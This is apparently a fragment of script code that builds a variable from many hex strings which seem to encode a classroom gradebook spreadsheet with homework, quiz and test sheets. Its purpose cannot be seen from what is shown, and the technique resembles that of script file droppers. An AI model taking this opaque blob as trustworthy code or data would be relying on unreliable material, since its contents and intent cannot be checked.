wD+="e00060000000000000000000000544003020e00070000000000000000000000000003020e00"
wD+="08000000000000000000008056406510020003000a000000ec0066000f0004f066000000a20"
wD+="c0af00800000003040000000a000063000bf0240000008000784a36018b0002000000bf0008"
wD+="000800810141000008c0010c000008ff0108000800000010f01200000000000800d2001600a"
wD+="6000c0010001f00d300000011f0000000005d001a0015001200060003001160784a3601d413"
wD+="92010000000000000000ec00080000000df000000000b601120012020000000000000000260"
wD+="01000000000003c00270000576861742074797065206f66206772617068206c6f6f6b732062"
wD+="65737420616e64207768793f3c00100000001200e90011002600000000000000ec009c000f0"
wD+="004f09c00000002030af00800000004040000000a0000f3000bf05a0000008000c84a360185"
wD+="00010000008b0002000000bf0008000a0047011ca8ffff4801fb340000490125ccffff4a01c"
wD+="60b00004c01c60b00004d011ca8ffff4e01fb340000810141000008c0010c000008ff010800"
wD+="08007f0304000c00000010f01200000000000a0070010100e2000b0070031000f100000011f"
wD+="0000000005d001a00150012001e0004001160c84a3601e01492010000000000000000ec0008"
wD+="0000000df000000000b60112001202000000000000000024001000000000003c00250000225"
wD+="041535445205350454349414c22202d2d56414c55455320414e4420464f524d4154533c0010"
wD+="0000001200120111002400000000000000ec0018001f0005f010000000000017f0080000000"
wD+="2000000040400003e021200b600100000004000000000000000000000001d000f0003040003"
wD+="0000000100040004000303ef000600050037000000670817006708000000000000000000000"
wD+="20001ffffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218"
wD+="0000000000010000002b0000005b4000007e4d0000004e00000d00020001000c00020064000"
wD+="f000200010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00"
wD+="02000000820002000100800008000000000000000000250204000000ff0081000200c104140"
wD+="0000015000000830002000000840002000000a10022000000ff000100010001000400020001"
wD+="ff000000000000e03f000000000000e03f524d120002000100dd00020001006300020001005"
wD+="500020008007d000c0000000000241b0f00020004007d000c00010001006d130f0003000400"
wD+="7d000c0008000800b60a0f00060004009b0000009d00020001009e002100000004000602c85"
wD+="a3601080100000000000000000000000000686f6d65776f726b00020e00010000002b000000"
wD+="00000f00000008021000010000000900ff000000000000010f0008021000020000000900ff0"
wD+="00000000020010f0008021000030000000900ff000000000000010f00080210000400000009"
wD+="00ff000000000020010f0008021000050000000900ff000000000020010f000802100006000"
wD+="0000900ff000000000000010f0008021000070000000900ff000000000000010f0008021000"
wD+="080000000900ff000000000020010f0008021000090000000900ff000000000020010f00080"
wD+="210000a0000000900ff000000000020010f00080210000b0000000900ff000000000020010f"
wD+="00080210000c0000000900ff000000000000010f00080210000d0000000900ff00000000002"
wD+="0010f00080210000e0000000900ff000000000020010f00080210000f0000000900ff000000"
wD+="000020010f0008021000100000000a00ff000000000020010f0008021000110000000a00ff0"
wD+="00000000020010f0008021000120000000a00ff000000000000010f0008021000130000000a"
wD+="00ff000000000000010f0008021000140000000a00ff000000000000010f000802100015000"
wD+="0000a00ff000000000020010f0008021000160000000a00ff000000000020010f0008021000"
wD+="170000000a00ff000000000000010f0008021000180000000a00ff000000000000010f00080"
wD+="21000190000000a00ff000000000020010f00080210001a0000000a00ff000000000020010f"
wD+="00080210001b0000000a00ff000000000020010f00080210001c0000000a00ff00000000000"
wD+="0010f00080210001d0000000a00ff000000000020010f00080210001e0000000a00ff000000"
wD+="000000010f00080210001f0000000a00ff000000000020010f00fd000a00010000000f00000"
wD+="00000fd000a00010001000f0001000000fd000a00010002000f0002000000fd000a00010003"
wD+="000f0047000000fd000a00010004000f0032000000fd000a00010005000f004c000000fd000"
wD+="a00010006000f004d000000fd000a00010007000f004e000000fd000a00020000000f002100"
wD+="0000fd000a00020001000f00220000007e020a00020002000f000000594003020e000200080"
wD+="01700577cc5577cc53240fd000a00030000000f0003000000fd000a00030001000f00090000"
wD+="007e020a00030002000f0000405940060051000300030026003c25c85382fc50400000a8073"
wD+="7fd3b0024030002c024060002c024070002c0240c0002c024120002c024130002c024140002"
wD+="c024170002c024180002c0241c0002c0241e0002c0420b050006005a000300040025009a999"
wD+="99999d953400000130008ff440024030002c024060002c0250600070002c002c024060002c0"
wD+="240c0002c024130002c024120002c024140002c024170002c024180002c0241c0002c0241e0"
wD+="002c0420ce30006005100030005002500a3554c5ac5949f400000030004ff3b0024030002c0"
wD+="24060002c024070002c0240c0002c024120002c024130002c024140002c024170002c024180"
wD+="002c0241c0002c0241e0002c0420b2e000600510003000600250040bc8129957a4640000003"
wD+="0005ff3b0024030002c024060002c024070002c0240c0002c024130002c024120002c024140"
wD+="002c024170002c024180002c0241c0002c0241e0002c0420b0c00060028000300070025008a"
wD+="ddf0a40f87e73f0000030006ff120044030002c044030003c0041544030006c006fd000a000"
wD+="30008001c0029000000fd000a00040000000f0004000000fd000a00040001000f000a000000"
wD+="7e020a00040002000f000000594003020e00040008001d0014b742712b145140fd000a00050"
wD+="000000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd"
wD+="000a00050008001c0029000000fd000a00060000000f0006000000fd000a00060001000f000"
wD+="9000000bd001200060002000f0000c050400f0000005140030003020e00060006000f004304"
wD+="1c42957a464006002800060007000f0037f4c8e6e7c696bf0000030007ff120044060002c04"
wD+="4060003c0041544060006c0067e020a00060008001d0000805140fd000a00070000000f0007"
wD+="000000fd000a00070001000f0009000000bd001200070002000f000104bf400f00000051400"
wD+="30003020e00070006000f0043041c42957a464006002800070007000f006994d53a853ad03f"
wD+="0000060007ff120044070002c044070003c0041544070006c006fd000a00080000000f00080"
wD+="00000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a00090000"
wD+="000f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000"
wD+="a000a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f000080"
wD+="5140fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b00020"
wD+="00f0000005940fd000a000c0000000f000f000000fd000a000c0001000f0009000000bd0012"
wD+="000c0002000f00000059400f0000005140030003020e000c0006000f0043041c42957a46400"
wD+="60028000c0007000f0037f4c8e6e7c6e63f0000070007ff1200440c0002c0440c0003c00415"
wD+="440c0006c006fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a0"
wD+="00d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a0000"
wD+="007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000"
wD+="f000a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a00"
wD+="100001000f000a0000007e020a00100002000f0000003440fd000a00110000000f001400000"
wD+="0fd000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f"
wD+="0015000000fd000a00120001000f0009000000bd001200120002000f00000059400f0000005"
wD+="140030003020e00120006000f0043041c42957a464006002800120007000f0037f4c8e6e7c6"
wD+="e63f00000c0007ff120044120002c044120003c0041544120006c006fd000a0012000800200"
wD+="026000000fd000a001200090020002a000000fd000a00130000000f0016000000fd000a0013"
wD+="0001000f0009000000bd001200130002000f00000000000f0000005140030003020e0013000"
wD+="6000f0043041c42957a464006002800130007000f007a8335655633f8bf0000120007ff1200"
wD+="44130002c044130003c0041544130006c006060023001300080027006766666666663440000"
wD+="0030003ff0d001fc3f5285c8fc2e53f1e1e00057e020a0013000900200000003e40fd000a00"
wD+="140000000f0017000000fd000a00140001000f0009000000bd001200140002000f000000000"
wD+="00f0000005140030003020e00140006000f0043041c42957a464006002800140007000f007a"
wD+="8335655633f8bf0000130007ff120044140002c044140003c0041544140006c006fd000a001"
wD+="50000000f0018000000fd000a00150001000f000a0000007e020a00150002000f0000005940"
wD+="fd000a00160000000f0019000000fd000a00160001000f000a0000007e020a00160002000f0"
wD+="000005440fd000a00170000000f001a000000fd000a00170001000f0009000000bd00120017"
wD+="0002000f00000059400f0000005140030003020e00170006000f0043041c42957a464006002"
wD+="800170007000f0037f4c8e6e7c6e63f0000140007ff120044170002c044170003c004154417"
wD+="0006c006fd000a00180000000f001b000000fd000a00180001000f0009000000bd001200180"
wD+="002000f00000000000f0000005140030003020e00180006000f0043041c42957a4640060028"
wD+="00180007000f007a8335655633f8bf0000170007ff120044180002c044180003c0041544180"
wD+="006c006fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900"
wD+="02000f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e0"
wD+="20a001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c"
wD+="0000007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000"
wD+="1000f0009000000bd0012001c0002000f00000059400f0000005140030003020e001c000600"
wD+="0f0043041c42957a4640060028001c0007000f0037f4c8e6e7c6e63f0000180007ff1200441"
wD+="c0002c0441c0003c00415441c0006c006fd000a001d0000000f001f000000fd000a001d0001"
wD+="000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000fd000"
wD+="a001e0001000f0009000000bd0012001e0002000f00000059400f0000005140030003020e00"
wD+="1e0006000f0043041c42957a4640060028001e0007000f0037f4c8e6e7c6e63f00001c0007f"
wD+="e1200441e0002c0441e0003c00415441e0006c006fd000a001f0000000f001e000000fd000a"
wD+="001f0001000f000a0000007e020a001f0002000f0000805640d7004200ac0c0000580270003"
wD+="c00c1013c0038007e0070002a002a002a002a0070002a002a002a002a002a008c00a5007000"
wD+="2a002a00700070002a002a002a0070002a0070000802100029000e000f00ff0000000000000"
wD+="10f00080210002a000e000f00ff000000000000010f000102060029000e001700010206002a"
wD+="000e001700d70008003c00000014000a00c2011800110003000100090803000080040013000"
wD+="2000903080007feec00aa000f0002f014010000300008f00800000003000000030800000f00"
wD+="03f0fc0000000f0004f028000000010009f0100000000000000000000000000000000000000"
wD+="002000af00800000000080000050000000f0004f052000000920c0af0080000000108000000"
wD+="0a000043000bf0180000007f0004010401bf0008000800ff0100000800bf030000020000001"
wD+="0f012000000010001000000010000000200000002000000000011f0000000005d0046001500"
wD+="120014000100012100000000ac199201000000000c001400000000000000000000000100080"
wD+="00000100000001300ee1f000008000500010300000a001400570000000000ec0072000f0004"
wD+="f06a000000920c0af00800000003080000000a000083000bf0300000007f0004010401bf000"
wD+="800080081014e00000883014d000008bf0110001000c0014d000008ff01080008003f020000"
wD+="0200000010f0120000000000000097002200c4000d00b0013b009700000011f0000000005d0"
wD+="01a001500120005000300116000000000781a920100000000000000000908100000062000e2"
wD+="28cd07c9c00000060200001400000015000000830002000000840002000000a100220000001"
wD+="20001000100010004000000781a000000000000e03f000000000000e03f7f00330002000300"
wD+="60100a004c1d4812dc0001000c0060100a008115e60ac80000000d0060100a008115e60ac80"
wD+="001000e00120002000100011002000000021010000000000000000000e8bfa60200403d0133"
wD+="100000a00004000100010064100800000001000000010032100400000002003310000007100"
wD+="c00000000000000ffff09004d000a101000ffffff0000000000010001004e004d0034100000"
wD+="03100c00030001000b000b00010000003310000051100f0000020000000007003a010001000"
wD+="2000d100e000000050147005200410044004500511013000102000000000b003b010002001e"
wD+="0002000200511013000202000000000b003b010002001e00000001005110080003010000000"
wD+="0000006100800ffff000000000000331000005f100200000034100000451002000000341000"
wD+="00441004001a000000241002000200251020000202010000000000eaffffffd0ffffff00000"
wD+="00000000000b1004d00103d0000331000004f10140002000200000000000000000000000000"
wD+="00000000261002000d005110080000010000000000003410000024100200030025102000020"
wD+="2010000000000eaffffffd0ffffff0000000000000000b1004d00103d0000331000004f1014"
wD+="000200020000000000000000000000000000000000261002000e00511008000001000000000"
wD+="00034100000461002000100411012000000a3020000f9030000200a0000bb04000033100000"
wD+="4f101400020002002d000000fb020000960c0000440c00001d1012000000000000000000000"
wD+="000000000000000003310000020100800010001000100010062101200000000000100000001"
wD+="00000000000000ef001e101e000200030100000000000000000000000000000000000000000"
wD+="3004d002900261002000c00341000001d101200010000000000000000000000000000000000"
wD+="331000001f102a0000000000000000000000000000000000000000000000000000000000000"
wD+="0000000000000000000001f011e101e00020003010000000000000000000000000000000000"
wD+="00000023004d00000021100200010007100c00000000000000ffff09004d003410000035100"
wD+="00032100400000003003310000007100c008080800000000000000017000a101000c0c0c000"
wD+="000000000100000016004f00341000001410140000000000000000000000000000000000000"
wD+="00000331000001710060000009600000022100a0000000000000000000f0015101400f40c00"
wD+="00b20600009a0200009701000003011f00331000004f10140005000200f40c0000af0600000"
wD+="000000000000000251020000202010000000000eaffffffd0ffffff0000000000000000b100"
wD+="4d0030090000331000004f10140002000200000000000000000000000000000000005110080"
wD+="000010000000000003410000034100000341000003410000025102000020201000000000095"
wD+="0600006b000000a3020000f801000081004d008a300000331000004f1014000200020018000"
wD+="0001a0000009700000034000000261002000d005110080000010000000000000d1014000000"
wD+="080148006f006d00650077006f0072006b00271006000100000000003410000034100000000"
wD+="20e00000000000b000000000001000000651002000200040235000000000000001600013100"
wD+="2f00320039002c00200033003000200050002e0020003400390032002c00200050002000350"
wD+="03000320004022f0001000000000013000131002f0033003100200032002f00310020004300"
wD+="68002000540065007300740020004100200004022d0002000000000012000132002f0031002"
wD+="c003200200070002e00200035003100360020002d0020003500310038000402270003000000"
wD+="00000f0001700072006f006a0065006300740020006f00750074006c0069006e00650004023"
wD+="10004000000000014000132002f0036002c0020003700200070002e00200037003900390020"
wD+="00230031002d003200350020000402290005000000000010000170002e00200035003300310"
wD+="02000350033003800200032002f0038002c0039000402370006000000000017000139002e00"
wD+="3300200039002e00340020007000790074006800610067006f007200650061006e002000740"
wD+="068006d0004022f0007000000000013000132002f00320037002c003200380020004d006100"
wD+="7400680020004100200074006500730074000402330008000000000015000133002f0031002"
wD+="c003200200077006b007300680074002000310030002e0031002f00310030002e0036000402"
wD+="21000900000000000c00016c006f0063007500730020007000610063006b006500740004024"
wD+="7000a00000000001f000133002f0037002c0038002000310031002e00310020006e006f0074"
wD+="0065007300200061006e0064002000700072006100630020004100200073006800740065100"
wD+="200010003020e00000000000000000000000040594003020e000100000000000000000000c0"
wD+="504003020e000200000000009a99999999d9534003020e00030000000000000000000000594"
wD+="003020e00040000000000000000000000594003020e00050000000000000000000000000003"
wD+="020e00060000000000000000000000000003020e00070000000000000000000000594003020"
wD+="e00080000000000000000000000000003020e00090000000000000000000000594003020e00"
wD+="0a000000000000000000000059406510020003000a0000003e021200b600030000004000000"
wD+="000000000000000001d000f00030300030000000100030003000303ef000600050037000000"
wD+="67081700670800000000000000000000020001ffffffff004000000a0000000908100000061"
wD+="000e228cd07c9c00000060200000b021800000000000100000025000000d05800004d610000"
wD+="076200000d00020001000c00020064000f000200010011000200000010000800fca9f1d24d6"
wD+="2503f5f00020001002a00020000002b00020000008200020001008000080000000000000000"
wD+="00250204000000ff0081000200c1041400000015000000830002000000840002000000a1002"
wD+="2000000ff000100010001000400020001ff000000000000e03f000000000000e03f006f5500"
wD+="020008007d000c0000000000db1f0f00020004007d000c00010001006d0b0f00020004009b0"
wD+="000009d00020001009e001d00000004000602d85a3601040100000000000000000000000000"
wD+="7175697a00020e00010000002500000000000900000008021000010000000900ff000000000"
wD+="000010f0008021000020000000900ff000000000020010f0008021000030000000900ff0000"
wD+="00000020010f0008021000040000000900ff000000000020010f0008021000050000000900f"
wD+="f000000000000010f0008021000060000000900ff000000000020010f000802100007000000"
wD+="0900ff000000000020010f0008021000080000000900ff000000000020010f0008021000090"
wD+="000000900ff000000000000010f00080210000a0000000900ff000000000020010f00080210"
wD+="000b0000000900ff000000000000010f00080210000c0000000900ff000000000020010f000"
wD+="80210000d0000000900ff000000000020010f00080210000e0000000900ff00000000002001"
wD+="0f00080210000f0000000900ff000000000020010f0008021000100000000300ff000000000"
wD+="020010f0008021000110000000300ff000000000020010f0008021000120000000300ff0000"
wD+="00000020010f0008021000130000000300ff000000000020010f0008021000140000000300f"
wD+="f000000000020010f0008021000150000000300ff000000000020010f000802100016000000"
wD+="0300ff000000000020010f0008021000170000000300ff000000000020010f0008021000180"
wD+="000000300ff000000000020010f0008021000190000000300ff000000000020010f00080210"
wD+="001a0000000300ff000000000020010f00080210001b0000000300ff000000000020010f000"
wD+="80210001c0000000300ff000000000020010f00080210001d0000000300ff00000000000001"
wD+="0f00080210001e0000000300ff000000000020010f00080210001f0000000300ff000000000"
wD+="020010f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a0001"
wD+="0002000f0002000000fd000a00010003000f0047000000fd000a00010004000f0032000000f"
wD+="d000a00010005000f0048000000fd000a00010006000f004d000000fd000a00010007000f00"
wD+="4e000000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a00020"
wD+="001000f00220000007e020a00020002000f0000005940fd000a00030000000f0003000000fd"
wD+="000a00030001000f00090000007e020a00030002000f0000005940fd000a00040000000f000"
wD+="4000000fd000a00040001000f000a0000007e020a00040002000f0000005940fd000a000500"
wD+="00000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940060"
wD+="02e00050003000f000000000000e050400000b80b37fc180024050002c024090002c0240b00"
wD+="02c0241d0002c042040500fd000a00060000000f0006000000fd000a00060001000f0009000"
wD+="0007e020a00060002000f0000c0504003020e0006000700170014b742712b145140fd000a00"
wD+="070000000f0007000000fd000a00070001000f00090000007e020a00070002000f000000444"
wD+="0fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002000f"
wD+="0000004940fd000a00090000000f000d000000fd000a00090001000f000b0000007e020a000"
wD+="90002000f0000005440fd000a000a0000000f000e000000fd000a000a0001000f000c000000"
wD+="7e020a000a0002000f0000805140fd000a000b0000000f0011000000fd000a000b0001000f0"
wD+="00b0000007e020a000b0002000f0000005940fd000a000c0000000f000f000000fd000a000c"
wD+="0001000f00090000007e020a000c0002000f0000005940fd000a000d0000000f0023000000f"
wD+="d000a000d0001000f000a0000007e020a000d0002000f0000003440fd000a000e0000000f00"
wD+="10000000fd000a000e0001000f000a0000007e020a000e0002000f0000004940fd000a000f0"
wD+="000000f0012000000fd000a000f0001000f000a0000007e020a000f0002000f0000004940fd"
wD+="000a00100000000f0013000000fd000a00100001000f000a0000007e020a00100002000f000"
wD+="0003440fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a001100"
wD+="02000f0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e0"
wD+="20a00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009"
wD+="0000007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000"
wD+="1000f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd00"
wD+="0a00150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190"
wD+="00000fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000"
wD+="000f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000"
wD+="a00180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000"
wD+="0000fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900020"
wD+="00f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a"
wD+="001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000"
wD+="0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100"
wD+="0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0"
wD+="01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000"
wD+="00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000"
wD+="f001e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d7004200"
wD+="1a08000058027e002a002a002a005c003c002a002a002a002a002a002a002a002a002a002a0"
wD+="02a002a002a002a002a002a002a002a002a002a002a002a002a002a00080210002200000007"
wD+="00ff000000000000010f0008021000230000000700ff000000000000010f000802100024000"
wD+="0000700ff000000000000010f00fd000a00220002000f0037000000fd000a00220006000f00"
wD+="2a0000007e020a00230006000f0000003440fd000a0024000000210038000000d7000a00740"
wD+="0000028001c000e00c2010c00030005000300090303003800ec00aa000f0002f03a01000040"
wD+="0008f00800000003000000020c00000f0003f00a0100000f0004f028000000010009f010000"
wD+="0000000000000000000000000000000000002000af008000000000c0000050000000f0004f0"
wD+="52000000920c0af008000000010c0000000a000043000bf0180000007f0004010401bf00080"
wD+="00800ff0100000800bf0300000200000010f012000000010001000000010000000200000002"
wD+="000000000011f0000000005d0046001500120014000100012100000000441d9201000000000"
wD+="c00140000000000000000000000010008000000100000001300ee1f00000800070001030000"
wD+="0a001400570000000000ec0078000f0004f078000000f2030af008000000020c0000000a000"
wD+="093000bf0360000008000a86e36018500010000008b0002000000bf0008000a004701ae5900"
wD+="004801cffaffff810141000008c001400000087f0300000c00000010f012000000000000005"
wD+="2032300d300020090022700a600000011f0000000005d001a00150012001e0002001160a86e"
wD+="3601a01d92010000000000000000ec00080000000df000000000b6011200120200000000000"
wD+="0000022001000000000003c00230000496e73657274207765696768746564207175697a2061"
wD+="76657261676520686572652e3c00100000001100c400110022000000ac9c3400ec0018001f0"
wD+="005f010000000000017f00800000002000000020c00003e021200b600000000004000000000"
wD+="000000000000001d000f00032700050000000100270027000505ef0006000500370000000a0"
wD+="000000908100000061000e228cd07c9c00000060200000b0218000000000001000000270000"
wD+="0027650000896d00005f6e00000d00020001000c00020064000f00020001001100020000001"
wD+="0000800fca9f1d24d62503f5f00020001002a00020000002b00020000008200020001008000"
wD+="08000000000000000000250204000000ff0081000200c104140000001500000083000200000"
wD+="0840002000000a10022000000ff00010001000100040100050505000000000000e03f000000"
wD+="000000e03f72655500020008007d000c0000000000db1f0f00020004017d000c00010001006"
wD+="d0b0f00020004019b0000009d00020001009e001d00000004000602046e3601040100000000"
wD+="0000000000000000007465737400020e0001000000270000000000080000000802100001000"
wD+="0000800ff000000000000010f0008021000020000000800ff000000000020010f0008021000"
wD+="030000000800ff000000000020010f0008021000040000000800ff000000000020010f00080"
wD+="21000050000000800ff000000000020010f0008021000060000000800ff000000000020010f"
wD+="0008021000070000000800ff000000000020010f0008021000080000000800ff00000000000"
wD+="0010f0008021000090000000800ff000000000020010f00080210000a0000000800ff000000"
wD+="000000010f00080210000b0000000800ff000000000020010f00080210000c0000000800ff0"
wD+="00000000020010f00080210000d0000000800ff000000000020010f00080210000e00000008"
wD+="00ff000000000020010f00080210000f0000000800ff000000000020010f000802100010000"
wD+="0000300ff000000000020010f0008021000110000000300ff000000000000010f0008021000"
wD+="120000000300ff000000000020010f0008021000130000000300ff000000000020010f00080"
wD+="21000140000000300ff000000000020010f0008021000150000000300ff000000000020010f"
wD+="0008021000160000000300ff000000000020010f0008021000170000000300ff00000000002"
wD+="0010f0008021000180000000300ff000000000020010f0008021000190000000300ff000000"
wD+="000020010f00080210001a0000000300ff000000000000010f00080210001b0000000300ff0"
wD+="00000000000010f00080210001c0000000300ff000000000020010f00080210001d00000003"
wD+="00ff000000000020010f00080210001e0000000300ff000000000020010f00080210001f000"
wD+="0000300ff000000000020010f00fd000a00010000000f0000000000fd000a00010001000f00"
wD+="01000000fd000a00010002000f0002000000fd000a00010003000f0047000000fd000a00010"
wD+="004000f004f000000fd000a00010005000f0048000000fd000a00010006000f004d000000fd"
wD+="000a00010007000f004e000000fd000a00020000000f0021000000fd000a00020001000f002"
wD+="20000007e020a00020002000f0000005940fd000a00030000000f0003000000fd000a000300"
wD+="01000f00090000007e020a00030002000f0000005940fd000a00040000000f0004000000fd0"
wD+="00a00040001000f000a0000007e020a00040002000f0000005940fd000a00050000000f0005"
wD+="000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd000a0006000"
wD+="0000f0006000000fd000a00060001000f00090000007e020a00060002000f0000c05040fd00"
wD+="0a00070000000f0007000000fd000a00070001000f00090000007e020a00070002000f00000"
wD+="04440fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002"
wD+="000f000000494006003300080003000f000000000000c051400000f00b37fc1d0024080002c"
wD+="0240a0002c024110002c0241a0002c0241b0002c042050500fd000a00090000000f000d0000"
wD+="00fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a000a0000000"
wD+="f000e000000fd000a000a0001000f000c0000007e020a000a0002000f0000805140fd000a00"
wD+="0b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000f000000594"
wD+="0fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a000c0002000f"
wD+="0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a000"
wD+="d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a000000"
wD+="7e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000f0"
wD+="00a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a0010"
wD+="0001000f000a0000007e020a00100002000f0000003440fd000a00110000000f0014000000f"
wD+="d000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f00"
wD+="15000000fd000a00120001000f00090000007e020a00120002000f0000005940fd000a00130"
wD+="000000f0016000000fd000a00130001000f00090000007e020a00130002000f0000000000fd"
wD+="000a00140000000f0017000000fd000a00140001000f00090000007e020a00140002000f000"
wD+="0000000fd000a00150000000f0018000000fd000a00150001000f000a0000007e020a001500"
wD+="02000f0000005940fd000a00160000000f0019000000fd000a00160001000f000a0000007e0"
wD+="20a00160002000f0000005440fd000a00170000000f001a000000fd000a00170001000f0009"
wD+="0000007e020a00170002000f0000005940fd000a00180000000f001b000000fd000a0018000"
wD+="1000f00090000007e020a00180002000f0000000000fd000a00190000000f001c000000fd00"
wD+="0a00190001000f000a0000007e020a00190002000f0000000000fd000a001a0000000f001d0"
wD+="00000fd000a001a0001000f000c0000007e020a001a0002000f0000005440fd000a001b0000"
wD+="000f001d000000fd000a001b0001000f000c0000007e020a001b0002000f0000005440fd000"
wD+="a001c0000000f001e000000fd000a001c0001000f00090000007e020a001c0002000f000000"
wD+="5940fd000a001d0000000f001f000000fd000a001d0001000f000b0000007e020a001d00020"
wD+="00f0000004440fd000a001e0000000f0020000000fd000a001e0001000f00090000007e020a"
wD+="001e0002000f0000005940fd000a001f0000000f001e000000fd000a001f0001000f000a000"
wD+="0007e020a001f0002000f0000805640d7004200ff070000580270002a002a002a002a002a00"
wD+="2a0061002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a0"
wD+="02a002a002a002a002a0008021000220000000300ff000000000000010f0008021000230000"
wD+="000300ff000000000000010f0008021000260000000300ff000000000000010f00fd000a002"
wD+="2000000210039000000fd000a00220001000f003a000000fd000a00220002000f002a000000"
wD+="fd000a00230001000f003b0000007e020a00230002000f0000003440fd000a00260001000f0"
wD+="046000000d7000a009000000028002a001c00c2010c00050008000400090303004600ec00aa"
wD+="000f0002f0a2000000500008f00800000002000000011000000f0003f08a0000000f0004f02"
wD+="8000000010009f0100000000000000000000000000000000000000002000af0080000000010"
wD+="0000050000000f0004f052000000920c0af00800000001100000000a000043000bf01800000"
wD+="07f0004010401bf0008000800ff0100000800bf0300000200000010f0120000000100010000"
wD+="00010000000200000002000000000011f0000000005d0046001500120014000100012100000"
wD+="0005c229201000000000c00140000000000000000000000010008000000100000001300ee1f"
wD+="000008000800010300000a0014005700000000003e021200b60000000000400000000000000"
wD+="0000000001d000f00032600010000000100260026000101ef0006000500370000000a000000"
wD+="0908100000061000e228cd07c9c00000060200000b021400000000000000000020000000d67"
wD+="30000d97900000d00020001000c00020064000f000200010011000200000010000800fca9f1"
wD+="d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000000"
wD+="0000000250204000000ff0081000200c1041400000015000000830002000000840002000000"
wD+="4d006a0300004500700073006f006e0020005300740079006c0075007300200043004f004c0"
wD+="04f005200200036003000300020004500530043002f005000200032000000000001040005dc"
wD+="008c0243ef800701000100ea0a6f08640001000f006801020001006801020001004c0065007"
wD+="400740065007200000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000010"
wD+="000000000000002000000020000000100000030010000000000000000000000000000000000"
wD+="0044494e55220000003402580053ab1e3f00000000000000000000000001000000000000000"
wD+="000000000000000080000000100000001000000000002000000040000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="00000580000004f535045414182820200000000000000010000000000000000000000000000"
wD+="0000000000010000000000000004000000000000000000000000000000000000006a0000000"
wD+="000000003000000010000000f000000a1002200010064000100010001000200680168010000"
wD+="00000000e03f000000000000e03f010055000200080000020e0000000000200000000000050"
wD+="0000008021000000000000500ff000000000000010f0008021000010000000500ff00000000"
wD+="0000010f0008021000020000000500ff000000000000010f0008021000030000000500ff000"
wD+="000000000010f0008021000040000000500ff000000000000010f0008021000050000000500"
wD+="ff000000000000010f0008021000060000000500ff000000000000010f00080210000700000"
wD+="00500ff000000000000010f0008021000080000000500ff000000000000010f000802100009"
wD+="0000000500ff000000000000010f00080210000a0000000500ff000000000000010f0008021"
wD+="0000b0000000500ff000000000000010f00080210000c0000000500ff000000000000010f00"
wD+="080210000d0000000500ff000000000000010f00080210000e0000000500ff0000000000000"
wD+="10f00080210000f0000000500ff000000000000010f0008021000100000000200ff00000000"
wD+="0000010f0008021000110000000200ff000000000000010f0008021000120000000200ff000"
wD+="000000000010f0008021000130000000200ff000000000000010f0008021000140000000200"
wD+="ff000000000000010f0008021000150000000200ff000000000000010f00080210001600000"
